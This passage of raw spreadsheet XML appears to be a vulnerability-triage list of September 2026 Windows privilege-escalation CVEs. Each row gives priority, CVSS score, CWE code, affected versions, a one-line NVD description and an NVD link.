t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P554" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q554" s="5" t="inlineStr" /><c r="R554" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S554" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Kerberos allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T554" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69685</t></is></c></row><row r="555"><c r="A555" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B555" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C555" s="5" t="inlineStr"><is><t>CVE-2026-69687</t></is></c><c r="D555" s="5" t="n"><v>7.8</v></c><c r="E555" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F555" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G555" s="5" t="inlineStr" /><c r="H555" s="5" t="n"><v>0.003</v></c><c r="I555" s="5" t="inlineStr" /><c r="J555" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K55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5" s="5" t="inlineStr" /><c r="M555" s="5" t="inlineStr" /><c r="N555" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O555" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P555" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q555" s="5" t="inlineStr" /><c r="R555" s="5" t="inlineStr"><is><t>CWE-191</t></is></c><c r="S555" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T555" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69687</t></is></c></row><row r="556"><c r="A556" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B556" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C556" s="5" t="inlineStr"><is><t>CVE-2026-69691</t></is></c><c r="D556" s="5" t="n"><v>7.8</v></c><c r="E556" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F556" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G556" s="5" t="inlineStr" /><c r="H556" s="5" t="n"><v>0.003</v></c><c r="I556" s="5" t="inlineStr" /><c r="J556" s="5" t="inlineStr" /><c r="K556" s="5" t="inlineStr" /><c r="L556" s="5" t="inlineStr" /><c r="M556" s="5" t="inlineStr" /><c r="N556" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O556" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P556" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q556" s="5" t="inlineStr" /><c r="R556" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S556" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Spaceport.sys allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T556" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69691</t></is></c></row><row r="557"><c r="A557" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B557" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C557" s="5" t="inlineStr"><is><t>CVE-2026-69707</t></is></c><c r="D557" s="5" t="n"><v>7.8</v></c><c r="E557" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F557" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G557" s="5" t="inlineStr" /><c r="H557" s="5" t="n"><v>0.003</v></c><c r="I557" s="5" t="inlineStr" /><c r="J557" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K5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7" s="5" t="inlineStr" /><c r="M557" s="5" t="inlineStr" /><c r="N557" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O557" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P557" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q557" s="5" t="inlineStr" /><c r="R557" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S557" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T557" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69707</t></is></c></row><row r="558"><c r="A558" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B558" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C558" s="5" t="inlineStr"><is><t>CVE-2026-69709</t></is></c><c r="D558" s="5" t="n"><v>7.8</v></c><c r="E558" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F558" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G558" s="5" t="inlineStr" /><c r="H558" s="5" t="n"><v>0.003</v></c><c r="I558" s="5" t="inlineStr" /><c r="J558" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K5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8" s="5" t="inlineStr" /><c r="M558" s="5" t="inlineStr" /><c r="N558" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O558" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P558" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q558" s="5" t="inlineStr" /><c r="R558" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S558" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T558" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69709</t></is></c></row><row r="559"><c r="A559" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B559" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C559" s="5" t="inlineStr"><is><t>CVE-2026-69720</t></is></c><c r="D559" s="5" t="n"><v>7.8</v></c><c r="E559" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F559" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G559" s="5" t="inlineStr" /><c r="H559" s="5" t="n"><v>0.003</v></c><c r="I559" s="5" t="inlineStr" /><c r="J559" s="5" t="inlineStr" /><c r="K559" s="5" t="inlineStr" /><c r="L559" s="5" t="inlineStr" /><c r="M559" s="5" t="inlineStr" /><c r="N559" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O559" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P559" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q559" s="5" t="inlineStr" /><c r="R559" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S559" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows MIDI Service Module allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T559" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69720</t></is></c></row><row r="560"><c r="A560" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B560" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C560" s="5" t="inlineStr"><is><t>CVE-2026-69725</t></is></c><c r="D560" s="5" t="n"><v>7.8</v></c><c r="E560" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F560" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G560" s="5" t="inlineStr" /><c r="H560" s="5" t="n"><v>0.003</v></c><c r="I560" s="5" t="inlineStr" /><c r="J560" s="5" t="inlineStr" /><c r="K560" s="5" t="inlineStr" /><c r="L560" s="5" t="inlineStr" /><c r="M560" s="5" t="inlineStr" /><c r="N560" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O560" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P560" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q560" s="5" t="inlineStr" /><c r="R560" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S560" s="5" t="inlineStr"><is><t>Double free in Windows Hello allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T560" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69725</t></is></c></row><row r="561"><c r="A561" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B561" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C561" s="5" t="inlineStr"><is><t>CVE-2026-69731</t></is></c><c r="D561" s="5" t="n"><v>7.8</v></c><c r="E561" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F561" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G561" s="5" t="inlineStr" /><c r="H561" s="5" t="n"><v>0.003</v></c><c r="I561" s="5" t="inlineStr" /><c r="J561" s="5" t="inlineStr" /><c r="K561" s="5" t="inlineStr" /><c r="L561" s="5" t="inlineStr" /><c r="M561" s="5" t="inlineStr" /><c r="N561" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O561" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P561" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q561" s="5" t="inlineStr" /><c r="R561" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S561" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in HID class driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T561" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69731</t></is></c></row><row r="562"><c r="A562" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B562" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C562" s="5" t="inlineStr"><is><t>CVE-2026-69738</t></is></c><c r="D562" s="5" t="n"><v>7.8</v></c><c r="E562" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F562" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G562" s="5" t="inlineStr" /><c r="H562" s="5" t="n"><v>0.003</v></c><c r="I562" s="5" t="inlineStr" /><c r="J562" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K56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62" s="5" t="inlineStr" /><c r="M562" s="5" t="inlineStr" /><c r="N562" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O562" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P562" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q562" s="5" t="inlineStr" /><c r="R562" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S562" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T562" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69738</t></is></c></row><row r="563"><c r="A563" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B563" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C563" s="5" t="inlineStr"><is><t>CVE-2026-69758</t></is></c><c r="D563" s="5" t="n"><v>7.8</v></c><c r="E563" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F563" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G563" s="5" t="inlineStr" /><c r="H563" s="5" t="n"><v>0.003</v></c><c r="I563" s="5" t="inlineStr" /><c r="J563" s="5" t="inlineStr" /><c r="K563" s="5" t="inlineStr" /><c r="L563" s="5" t="inlineStr" /><c r="M563" s="5" t="inlineStr" /><c r="N563" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O563" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P563" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q563" s="5" t="inlineStr" /><c r="R563" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S563" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Universal Disk Format File System Driver (UDFS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T563" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69758</t></is></c></row><row r="564"><c r="A564" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B564" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C564" s="5" t="inlineStr"><is><t>CVE-2026-69785</t></is></c><c r="D564" s="5" t="n"><v>7.8</v></c><c r="E564" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F564" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G564" s="5" t="inlineStr" /><c r="H564" s="5" t="n"><v>0.003</v></c><c r="I564" s="5" t="inlineStr" /><c r="J564" s="5" t="inlineStr" /><c r="K564" s="5" t="inlineStr" /><c r="L564" s="5" t="inlineStr" /><c r="M564" s="5" t="inlineStr" /><c r="N564" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O564" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P564" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q564" s="5" t="inlineStr" /><c r="R564" s="5" t="inlineStr"><is><t>CWE-426</t></is></c><c r="S564" s="5" t="inlineStr"><is><t>Untrusted search path in Windows Smart Card allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T564" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69785</t></is></c></row><row r="565"><c r="A565" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B565" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C565" s="5" t="inlineStr"><is><t>CVE-2026-69787</t></is></c><c r="D565" s="5" t="n"><v>7.8</v></c><c r="E565" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F565" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G565" s="5" t="inlineStr" /><c r="H565" s="5" t="n"><v>0.003</v></c><c r="I565" s="5" t="inlineStr" /><c r="J565" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K56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65" s="5" t="inlineStr" /><c r="M565" s="5" t="inlineStr" /><c r="N565" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O565" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P565" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q565" s="5" t="inlineStr" /><c r="R565" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S565" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T565" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69787</t></is></c></row><row r="566"><c r="A566" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B566" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C566" s="5" t="inlineStr"><is><t>CVE-2026-69790</t></is></c><c r="D566" s="5" t="n"><v>7.8</v></c><c r="E566" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F566" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G566" s="5" t="inlineStr" /><c r="H566" s="5" t="n"><v>0.003</v></c><c r="I566" s="5" t="inlineStr" /><c r="J566" s="5" t="inlineStr" /><c r="K566" s="5" t="inlineStr" /><c r="L566" s="5" t="inlineStr" /><c r="M566" s="5" t="inlineStr" /><c r="N566" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O566" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P566" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q566" s="5" t="inlineStr" /><c r="R566" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S566" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Credential Providers allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T566" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69790</t></is></c></row><row r="567"><c r="A567" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B567" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C567" s="5" t="inlineStr"><is><t>CVE-2026-69799</t></is></c><c r="D567" s="5" t="n"><v>7.8</v></c><c r="E567" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F567" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G567" s="5" t="inlineStr" /><c r="H567" s="5" t="n"><v>0.002</v></c><c r="I567" s="5" t="inlineStr" /><c r="J567" s="5" t="inlineStr" /><c r="K567" s="5" t="inlineStr" /><c r="L567" s="5" t="inlineStr" /><c r="M567" s="5" t="inlineStr" /><c r="N567" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O567" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P567" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q567" s="5" t="inlineStr" /><c r="R567" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="S567" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Hello allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T567" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69799</t></is></c></row><row r="568"><c r="A568" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B568" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C568" s="5" t="inlineStr"><is><t>CVE-2026-69801</t></is></c><c r="D568" s="5" t="n"><v>7.8</v></c><c r="E568" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F568" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G568" s="5" t="inlineStr" /><c r="H568" s="5" t="n"><v>0.003</v></c><c r="I568" s="5" t="inlineStr" /><c r="J568" s="5" t="inlineStr" /><c r="K568" s="5" t="inlineStr" /><c r="L568" s="5" t="inlineStr" /><c r="M568" s="5" t="inlineStr" /><c r="N568" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O568" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P568" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q568" s="5" t="inlineStr" /><c r="R568" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S568" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T568" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69801</t></is></c></row><row r="569"><c r="A569" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B569" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C569" s="5" t="inlineStr"><is><t>CVE-2026-69821</t></is></c><c r="D569" s="5" t="n"><v>7.8</v></c><c r="E569" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F569" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G569" s="5" t="inlineStr" /><c r="H569" s="5" t="n"><v>0.003</v></c><c r="I569" s="5" t="inlineStr" /><c r="J569" s="5" t="inlineStr" /><c r="K569" s="5" t="inlineStr" /><c r="L569" s="5" t="inlineStr" /><c r="M569" s="5" t="inlineStr" /><c r="N569" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O569" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P569" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q569" s="5" t="inlineStr" /><c r="R569" s="5" t="inlineStr"><is><t>CWE-116</t></is></c><c r="S569" s="5" t="inlineStr"><is><t>Improper encoding or escaping of output in Active Directory Certificate Services (AD CS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T569" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69821</t></is></c></row><row r="570"><c r="A570" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B570" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C570" s="5" t="inlineStr"><is><t>CVE-2026-69822</t></is></c><c r="D570" s="5" t="n"><v>7.8</v></c><c r="E570" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F570" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G570" s="5" t="inlineStr" /><c r="H570" s="5" t="n"><v>0.003</v></c><c r="I570" s="5" t="inlineStr" /><c r="J570" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K57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570" s="5" t="inlineStr" /><c r="M570" s="5" t="inlineStr" /><c r="N570" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O570" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P570" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q570" s="5" t="inlineStr" /><c r="R570" s="5" t="inlineStr"><is><t>CWE-122, CWE-197</t></is></c><c r="S570" s="5" t="inlineStr"><is><t>Numeric truncation error in Windows Kerberos allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T570" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69822</t></is></c></row><row r="571"><c r="A571" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B571" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C571" s="5" t="inlineStr"><is><t>CVE-2026-69841</t></is></c><c r="D571" s="5" t="n"><v>7.8</v></c><c r="E571" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F571" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G571" s="5" t="inlineStr" /><c r="H571" s="5" t="n"><v>0.003</v></c><c r="I571" s="5" t="inlineStr" /><c r="J571" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K5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1" s="5" t="inlineStr" /><c r="M571" s="5" t="inlineStr" /><c r="N571" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O571" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P571" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q571" s="5" t="inlineStr" /><c r="R571" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S571" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Encrypting File System (EFS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T571" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69841</t></is></c></row><row r="572"><c r="A572" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B572" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C572" s="5" t="inlineStr"><is><t>CVE-2026-69844</t></is></c><c r="D572" s="5" t="n"><v>7.8</v></c><c r="E572" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F572" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G572" s="5" t="inlineStr" /><c r="H572" s="5" t="n"><v>0.003</v></c><c r="I572" s="5" t="inlineStr" /><c r="J572" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K5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2" s="5" t="inlineStr" /><c r="M572" s="5" t="inlineStr" /><c r="N572" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O572" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P572" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q572" s="5" t="inlineStr" /><c r="R572" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S572" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T572" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69844</t></is></c></row><row r="573"><c r="A573" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B573" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C573" s="5" t="inlineStr"><is><t>CVE-2026-69864</t></is></c><c r="D573" s="5" t="n"><v>7.8</v></c><c r="E573" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F573" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G573" s="5" t="inlineStr" /><c r="H573" s="5" t="n"><v>0.002</v></c><c r="I573" s="5" t="inlineStr" /><c r="J573" s="5" t="inlineStr" /><c r="K573" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t></is></c><c r="L573" s="5" t="inlineStr" /><c r="M573" s="5" t="inlineStr" /><c r="N573" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O573" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P573" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q573" s="5" t="inlineStr" /><c r="R573" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S573" s="5" t="inlineStr"><is><t>Use after free in Windows Hello allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T573" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69864</t></is></c></row><row r="574"><c r="A574" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B574" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C574" s="5" t="inlineStr"><is><t>CVE-2026-69900</t></is></c><c r="D574" s="5" t="n"><v>7.8</v></c><c r="E574" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F574" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G574" s="5" t="inlineStr" /><c r="H574" s="5" t="n"><v>0.003</v></c><c r="I574" s="5" t="inlineStr" /><c r="J574" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K574" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L574" s="5" t="inlineStr" /><c r="M574" s="5" t="inlineStr" /><c r="N574" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O574" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P574" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q574" s="5" t="inlineStr" /><c r="R574" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="S574" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Kernel Streaming WOW Thunk Service Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T574" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69900</t></is></c></row><row r="575"><c r="A575" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B575" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C575" s="5" t="inlineStr"><is><t>CVE-2026-69907</t></is></c><c r="D575" s="5" t="n"><v>7.8</v></c><c r="E575" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F575" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G575" s="5" t="inlineStr" /><c r="H575" s="5" t="n"><v>0.003</v></c><c r="I575" s="5" t="inlineStr" /><c r="J575" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K57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75" s="5" t="inlineStr" /><c r="M575" s="5" t="inlineStr" /><c r="N575" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O575" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P575" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q575" s="5" t="inlineStr" /><c r="R575" s="5" t="inlineStr"><is><t>CWE-280</t></is></c><c r="S575" s="5" t="inlineStr"><is><t>Improper handling of insufficient permissions or privileges in Windows Enterprise App Management allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T575" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69907</t></is></c></row><row r="576"><c r="A576" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B576" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C576" s="5" t="inlineStr"><is><t>CVE-2026-69921</t></is></c><c r="D576" s="5" t="n"><v>7.8</v></c><c r="E576" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F576" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G576" s="5" t="inlineStr" /><c r="H576" s="5" t="n"><v>0.003</v></c><c r="I576" s="5" t="inlineStr" /><c r="J576" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K576" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L576" s="5" t="inlineStr" /><c r="M576" s="5" t="inlineStr" /><c r="N576" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O576" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P576" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q576" s="5" t="inlineStr" /><c r="R576" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S576" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T576" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69921</t></is></c></row><row r="577"><c r="A577" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B577" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C577" s="5" t="inlineStr"><is><t>CVE-2026-70289</t></is></c><c r="D577" 